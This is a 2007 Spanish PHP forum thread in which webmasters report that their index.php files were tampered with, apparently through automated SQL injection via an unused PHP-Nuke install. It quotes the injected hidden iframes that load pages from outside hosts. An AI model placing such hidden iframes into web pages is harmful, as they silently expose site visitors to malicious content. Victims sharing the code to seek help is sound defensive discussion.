Foros del Web » Programando para Internet » PHP »

Me han modificado el archivo "index.php".

 Estas en el tema de Me han modificado el archivo "index.php". en el foro de PHP en Foros del Web. En algunas paginas que tengo alojadas en un servidor me han modificado el index.php poniendo esto al final del archivo: Código PHP: < iframe src = ...
  #1 (permalink)  
Antiguo 26/04/2007, 08:38
Avatar de deccweb  
Fecha de Ingreso: febrero-2003
Ubicación: Mataro
Mensajes: 365
Antigüedad: 21 años, 2 meses
Puntos: 0
Me han modificado el archivo "index.php".
En algunas paginas que tengo alojadas en un servidor me han modificado el index.php poniendo esto al final del archivo:

Código PHP:
<iframe src='http://208.69.230.178/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe
Pero lo raro, es que en otra web que tengo que esta alojado en otro servidor totalmente diferente también me sale lo mismo y con la misma dirección y todo.

Código PHP:
<iframe src='http://208.69.230.178/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe
__________________
Calle17.net

edgargranados.es
  #2 (permalink)  
Antiguo 26/04/2007, 09:04
Avatar de GatorV
$this->role('moderador');
  
Fecha de Ingreso: mayo-2006
Ubicación: /home/ams/
Mensajes: 38.567
Antigüedad: 17 años, 11 meses
Puntos: 2135
Re: Me han modificado el archivo "index.php".
Usas algun CMS?
  #3 (permalink)  
Antiguo 27/04/2007, 00:30
Avatar de deccweb  
Fecha de Ingreso: febrero-2003
Ubicación: Mataro
Mensajes: 365
Antigüedad: 21 años, 2 meses
Puntos: 0
Re: Me han modificado el archivo "index.php".
no, es programado por mi.
__________________
Calle17.net

edgargranados.es
  #4 (permalink)  
Antiguo 27/04/2007, 03:56
Avatar de franquero  
Fecha de Ingreso: julio-2005
Mensajes: 179
Antigüedad: 18 años, 9 meses
Puntos: 1
Re: Me han modificado el archivo "index.php".
A mí me ha pasado lo mismo.

Me han modificado el index añadiendo <iframe src='http://ayiosamvrosios.com/_tr/index.php' height=0 width=0 name='ad'>ad</iframe>

Pero no sólo eso, en mi caso han sido mucho más destructivos: todas las líneas del index.php han sido truncadas, es decir, han eliminado los dos últimos caracteres de cada línea: <?php ---> <?p y mi web desmontada.

La web es un oscommerce (hasta ahora no conozco agujeros negros en oscommerce), y está en un servidor dedicado junto dos otros sitios:

- uno tiene un php nuke que no se está utilizando (es decir, se ha sustituido el index y abre una web que no tiene nada que ver con el php nuke). El index.php del nuke que no se utiliza también ha sido modificado y se le ha añadido un <iframe>

- Otro tiene un foro phpbb deshabilitado.

La empresa que gestiona el servidor nos ha hablado de la vulnerabilidad del php nuke y nos ha recomendado borrarlo ya que no lo usamos, pero yo no me explico cómo desde el nuke de un hosting pueden acceder al index.php de otro.

Un saludo

EDITO: Respuestas de la empresa que gestiona el servidor

P - ¿Cómo se puede utilizar un php nuke deshabilitado para atacar otro hosting?
R - son ataques automáticos que utilizan inserciones SQL en la base de datos y otras medidas

P - ¿Cómo se puede saber que el sitio con php nuke y el que no lo tiene pero ha sido modificado están en el mismo servidor?
R - no buscan hosting en la misma maquina, sino hosting con php-nuke y otros sistemas vulnerables.


Me han dicho que ya les ha pasado en otros servidores, que acceden con inyecciones SQL a la máquina y cambián todos los indexs que hay en el servidor.
Si fuera posible alguna explicación más detallada os lo agradecería
__________________
Es una suerte que la sociedad libre sea más productiva, porque de no haberlo sido jamás se habría tolerado.
Última edición por franquero; 27/04/2007 a las 05:46 Razón: Ampliar información
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta


« Tema Anterior | Próximo Tema »


La zona horaria es GMT -6. Ahora son las 15:46.